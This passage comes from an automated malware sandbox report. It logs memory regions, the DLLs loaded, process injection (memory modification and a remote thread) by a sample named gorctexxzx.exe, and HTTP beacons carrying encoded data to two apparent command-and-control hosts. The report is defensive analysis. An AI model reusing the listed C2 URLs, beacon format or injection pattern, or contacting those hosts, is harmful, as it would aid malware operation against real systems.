| private_0x0000000002410000 | 0x02410000 | 0x0250ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002560000 | 0x02560000 | 0x0265ffff | Private Memory | Readable, Writable |
|
|
|
- |
| msvcr100.dll | 0x6cd50000 | 0x6ce0dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| npmproxy.dll | 0x6efd0000 | 0x6efd7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rasadhlp.dll | 0x6f850000 | 0x6f855fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| netprofm.dll | 0x70600000 | 0x70659fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sensapi.dll | 0x72d70000 | 0x72d75fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rasman.dll | 0x73730000 | 0x73744fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rasapi32.dll | 0x73750000 | 0x737a1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| fwpuclnt.dll | 0x73fe0000 | 0x74017fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| winnsi.dll | 0x74120000 | 0x74126fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| iphlpapi.dll | 0x74130000 | 0x7414bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nlaapi.dll | 0x74240000 | 0x7424ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntmarta.dll | 0x74550000 | 0x74570fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rtutils.dll | 0x74650000 | 0x7465cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| winrnr.dll | 0x74880000 | 0x74887fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pnrpnsp.dll | 0x74890000 | 0x748a1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| napinsp.dll | 0x748c0000 | 0x748cffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| comctl32.dll | 0x74eb0000 | 0x7504dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| version.dll | 0x75420000 | 0x75428fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wshtcpip.dll | 0x754b0000 | 0x754b4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rsaenh.dll | 0x75740000 | 0x7577afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| dnsapi.dll | 0x75820000 | 0x75863fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wship6.dll | 0x75950000 | 0x75955fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mswsock.dll | 0x75960000 | 0x7599bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptsp.dll | 0x759a0000 | 0x759b5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x75e00000 | 0x75e1afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x75e20000 | 0x75e2bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrtremote.dll | 0x75ec0000 | 0x75ecdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| profapi.dll | 0x75ed0000 | 0x75edafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msasn1.dll | 0x75f40000 | 0x75f4bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| crypt32.dll | 0x76050000 | 0x7616cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wldap32.dll | 0x763a0000 | 0x763e4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| iertutil.dll | 0x763f0000 | 0x765eafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wininet.dll | 0x76600000 | 0x766f4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| clbcatq.dll | 0x77600000 | 0x77682fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| oleaut32.dll | 0x77690000 | 0x7771efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| urlmon.dll | 0x77830000 | 0x77965fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffd6000 | 0x7ffd6000 | 0x7ffd6fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffd7000 | 0x7ffd7000 | 0x7ffd7fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffd8fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffd9000 | 0x7ffd9000 | 0x7ffd9fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffda000 | 0x7ffda000 | 0x7ffdafff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffdbfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdc000 | 0x7ffdc000 | 0x7ffdcfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdd000 | 0x7ffdd000 | 0x7ffddfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Injection Information
| Injection Type | Source Process | Source Os Thread ID | Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Modify Memory | #8: c:\windows\system32\gorctexxzx.exe | 0xecc | address = 0x50000, size = 14348 |
|
1 | |
| Create Remote Thread | #8: c:\windows\system32\gorctexxzx.exe | 0xecc | address = 0x50202 |
|
1 |
Host Behavior
File (6)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Pipe | \device\namedpipe\c41b2304 | open_mode = PIPE_ACCESS_INBOUND, PIPE_ACCESS_OUTBOUND, FILE_FLAG_OVERLAPPED, pipe_mode = PIPE_READMODE_MESSAGE, PIPE_TYPE_MESSAGE, max_instances = 1 |
|
1 | |
| Read | - | size = 65535, size_out = 134 |
|
1 | |
| Read | - | size = 65535, size_out = 4263 |
|
1 | |
| Read | - | size = 65535, size_out = 8 |
|
1 | |
| Write | - | size = 13 |
|
1 | |
| Write | - | size = 308 |
|
1 |
Module (55)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | WinInet.dll | base_address = 0x76600000 |
|
1 | |
| Load | urlmon.dll | base_address = 0x77830000 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = realloc, address_out = 0x7772b10d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = sprintf, address_out = 0x7773d354 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = srand, address_out = 0x7772f757 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = rand, address_out = 0x7772c070 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _vsnprintf, address_out = 0x7772d1a8 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strtok, address_out = 0x7772df1f |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strcmp, address_out = 0x77738b11 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateNamedPipeW, address_out = 0x7620270f |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileW, address_out = 0x7621cc56 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetNamedPipeHandleState, address_out = 0x7622f420 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetEvent, address_out = 0x7621bccc |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetOverlappedResult, address_out = 0x76212f04 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ConnectNamedPipe, address_out = 0x76202727 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlushFileBuffers, address_out = 0x76207f81 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DisconnectNamedPipe, address_out = 0x7622f438 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = OpenEventW, address_out = 0x7621548b |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ResetEvent, address_out = 0x7621bcb4 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemTime, address_out = 0x7621ced8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ExitProcess, address_out = 0x7622214f |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetLastError, address_out = 0x7621bb08 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = OutputDebugStringA, address_out = 0x7620eb36 |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = HttpSendRequestExA, address_out = 0x76691812 |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = HttpQueryInfoA, address_out = 0x7661a33e |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = InternetConnectA, address_out = 0x766249e9 |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = InternetReadFile, address_out = 0x7661b406 |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = InternetWriteFile, address_out = 0x766346da |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = HttpOpenRequestA, address_out = 0x76624c7d |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = HttpEndRequestA, address_out = 0x766345ea |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = HttpAddRequestHeadersA, address_out = 0x7661dcd2 |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = HttpSendRequestA, address_out = 0x766918f8 |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = InternetOpenA, address_out = 0x7662f18e |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = InternetCloseHandle, address_out = 0x7661ab49 |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = InternetQueryOptionA, address_out = 0x76611b56 |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = InternetSetOptionA, address_out = 0x766175e8 |
|
1 | |
| Get Address | c:\windows\system32\urlmon.dll | function = ObtainUserAgentString, address_out = 0x77861d76 |
|
1 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = CRH2YWU7 |
|
2 | |
| Get Time | type = System Time, time = 2018-04-29 13:07:31 (UTC) |
|
1 |
Network Behavior
HTTP Sessions (2)
| Information | Value |
|---|---|
| Total Data Sent | 969 bytes |
| Total Data Received | 4.40 KB |
| Contacted Host Count | 2 |
| Contacted Hosts | webonline.mefound.com, easport-news.publicvm.com |
HTTP Session #1
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E) |
| Server Name | webonline.mefound.com |
| Server Port | 0 |
| Data Sent | 445 |
| Data Received | 4 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = webonline.mefound.com, server_port = 0 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP/1.1, target_resource = index/index.php?h=ppbto8NHADo%3d&d=ppboQHhZlzqml%2bKS9XExD56k2JTzdDAOlqbto8NHADqmlu2jw0d%3d, accept_types = 0, flags = INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE |
|
1 | |
| Add HTTP Request Headers | headers = Accept: */* |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = webonline.mefound.com/index/index.php?h=ppbto8NHADo%3d&d=ppboQHhZlzqml%2bKS9XExD56k2JTzdDAOlqbto8NHADqmlu2jw0d%3d |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Close Session | - |
|
2 |
HTTP Session #2
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E) |
| Server Name | easport-news.publicvm.com |
| Server Port | 0 |
| Data Sent | 524 |
| Data Received | 4500 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = easport-news.publicvm.com, server_port = 0 |
|
1 | |
| Open HTTP Request | http_verb = POST, http_version = HTTP/1.1, target_resource = index/index.php?h=8AsKjDaVkr4%3d&d=8gsPb42LBb7wCgW9AKOji8g5P7sGpqKKwDsKjDaVkr7wCwqMNpWjiMY6P7QEoKWOwzs%2bvAbRo43EPDi8BKyiit5heusWtbKe0CsqrBa1sp7QKyqsFrWyns%3d%3d, accept_types = 0, flags = INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE |
|
1 | |
| Add HTTP Request Headers | headers = Content-Type: multipart/form-data; boundary=---------------------------64872e454cf54de |
|
1 | |
| Send HTTP Request | url = easport-news.publicvm.com/index/index.php?h=8AsKjDaVkr4%3d&d=8gsPb42LBb7wCgW9AKOji8g5P7sGpqKKwDsKjDaVkr7wCwqMNpWjiMY6P7QEoKWOwzs%2bvAbRo43EPDi8BKyiit5heusWtbKe0CsqrBa1sp7QKyqsFrWyns%3d%3d |
|
1 | |
| Add HTTP Request Data | size = 134, size_out = 134 |
|
1 | |
| Add HTTP Request Data | size = 4004, size_out = 4004 |
|
1 | |
| Add HTTP Request Data | size = 50, size_out = 50 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Read Response | size = 16384, size_out = 304 |
|
1 | |
| Read Response | size = 16384, size_out = 0 |
|
1 | |
| Close Session | - |
|
2 |
Process #78: firefox.exe
59
22
| Information | Value |
|---|---|
| ID | #78 |
| File Name | c:\program files\mozilla firefox\firefox.exe |
| Command Line | "c:\program files\mozilla firefox\firefox.exe" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:01:50, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:39 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x7a4 |
| Parent PID | 0xaac (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
7E8
0x
5F0
0x
6B4
0x
188
0x
2DC
0x
3B0
0x
70C
0x
438
0x
8D8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00042fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x00053fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x00060fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000070000 | 0x00070000 | 0x00071fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| windowsshell.manifest | 0x00080000 | 0x00080fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000000080000 | 0x00080000 | 0x00080fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000090000 | 0x00090000 | 0x00091fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| index.dat | 0x000a0000 | 0x000a7fff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| private_0x00000000000b0000 | 0x000b0000 | 0x000effff | Private Memory | Readable, Writable |
|
|
|
- |
| locale.nls | 0x000f0000 | 0x00156fff | Memory Mapped File | Readable |
|
|
|
- |
| index.dat | 0x00160000 | 0x0016ffff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x00170fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000170000 | 0x00170000 | 0x00170fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| firefox.exe | 0x00180000 | 0x001c3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| index.dat | 0x001d0000 | 0x001fbfff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000200000 | 0x00200000 | 0x00200fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000210000 | 0x00210000 | 0x00210fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000220000 | 0x00220000 | 0x00220fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000230000 | 0x00230000 | 0x00236fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000240000 | 0x00240000 | 0x00241fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000250000 | 0x00250000 | 0x0034ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000350000 | 0x00350000 | 0x00417fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000420000 | 0x00420000 | 0x0045ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000460000 | 0x00460000 | 0x0055ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000560000 | 0x00560000 | 0x00660fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| urlmon.dll.mui | 0x00670000 | 0x00677fff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| private_0x00000000006a0000 | 0x006a0000 | 0x006affff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000006b0000 | 0x006b0000 | 0x012affff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000012b0000 | 0x012b0000 | 0x0132ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001370000 | 0x01370000 | 0x0146ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001480000 | 0x01480000 | 0x0148ffff | Private Memory | Readable, Writable |
|
|
|
- |
| sortdefault.nls | 0x01490000 | 0x0175efff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000001760000 | 0x01760000 | 0x0197ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000017a0000 | 0x017a0000 | 0x0189ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000018a0000 | 0x018a0000 | 0x0192ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000018a0000 | 0x018a0000 | 0x0191ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001920000 | 0x01920000 | 0x0192ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001940000 | 0x01940000 | 0x0197ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001a00000 | 0x01a00000 | 0x01afffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001b80000 | 0x01b80000 | 0x01c7ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001c80000 | 0x01c80000 | 0x01e3ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001c80000 | 0x01c80000 | 0x01d7ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001e30000 | 0x01e30000 | 0x01e3ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001e40000 | 0x01e40000 | 0x01f3ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001f40000 | 0x01f40000 | 0x0203ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002080000 | 0x02080000 | 0x0217ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000021a0000 | 0x021a0000 | 0x0229ffff | Private Memory | Readable, Writable |
|
|
|
- |
| msvcr100.dll | 0x6cd50000 | 0x6ce0dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| npmproxy.dll | 0x6efd0000 | 0x6efd7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rasadhlp.dll | 0x6f850000 | 0x6f855fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| netprofm.dll | 0x70600000 | 0x70659fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sensapi.dll | 0x72d70000 | 0x72d75fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rasman.dll | 0x73730000 | 0x73744fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rasapi32.dll | 0x73750000 | 0x737a1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| fwpuclnt.dll | 0x73fe0000 | 0x74017fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| winnsi.dll | 0x74120000 | 0x74126fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| iphlpapi.dll | 0x74130000 | 0x7414bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nlaapi.dll | 0x74240000 | 0x7424ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntmarta.dll | 0x74550000 | 0x74570fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rtutils.dll | 0x74650000 | 0x7465cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| winrnr.dll | 0x74880000 | 0x74887fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pnrpnsp.dll | 0x74890000 | 0x748a1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| napinsp.dll | 0x748c0000 | 0x748cffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| comctl32.dll | 0x74eb0000 | 0x7504dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| version.dll | 0x75420000 | 0x75428fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wshtcpip.dll | 0x754b0000 | 0x754b4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rsaenh.dll | 0x75740000 | 0x7577afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| dnsapi.dll | 0x75820000 | 0x75863fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wship6.dll | 0x75950000 | 0x75955fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mswsock.dll | 0x75960000 | 0x7599bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptsp.dll | 0x759a0000 | 0x759b5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x75e00000 | 0x75e1afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x75e20000 | 0x75e2bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrtremote.dll | 0x75ec0000 | 0x75ecdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| profapi.dll | 0x75ed0000 | 0x75edafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msasn1.dll | 0x75f40000 | 0x75f4bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| crypt32.dll | 0x76050000 | 0x7616cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
